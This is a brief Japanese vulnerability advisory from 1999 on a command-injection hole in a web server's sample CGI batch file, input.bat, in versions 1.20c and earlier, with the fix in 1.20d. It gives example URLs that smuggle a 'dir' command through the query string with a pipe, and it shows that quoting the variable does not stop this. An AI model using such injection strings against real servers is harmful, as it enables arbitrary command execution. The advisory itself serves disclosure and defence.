CGIサンプルのバッチファイルを利用したセキュリティホール
1999/10/21, The Shadow Penguin Security 代表 UNYUN さんによる指摘
対象バージョン: Version1.20cとそれ以前
例:
http://localhost/cgi-bin/input.bat?|dir によって dir が実行される。
解説: input.bat で、
echo QUERY_STRING=%QUERY_STRING%
の実行時、まず、
echo QUERY_STRING=|dir
と変更されてから実行されるため、 QUERY_STRING= を出力後 dir が実行される。
同様に任意のコマンドが実行可能。
echo QUERY_STRING="%QUERY_STRING%"
としても、
http://localhost/cgi-bin/input.bat?"|dir"
とすると、
echo QUERY_STRING=""|dir""
となるので、
QUERY_STRING="" を出力後 dir"" が実行される。
対策: Version 1.20d (1999/10/23)